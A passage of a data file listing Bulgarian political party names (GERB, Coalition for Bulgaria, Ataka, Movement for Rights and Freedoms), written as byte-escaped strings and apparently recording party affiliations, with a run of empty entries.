\xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', 
'\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 
\xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f 
\xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 
\xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 
\xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f 
\xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f 
\xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f 
\xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f 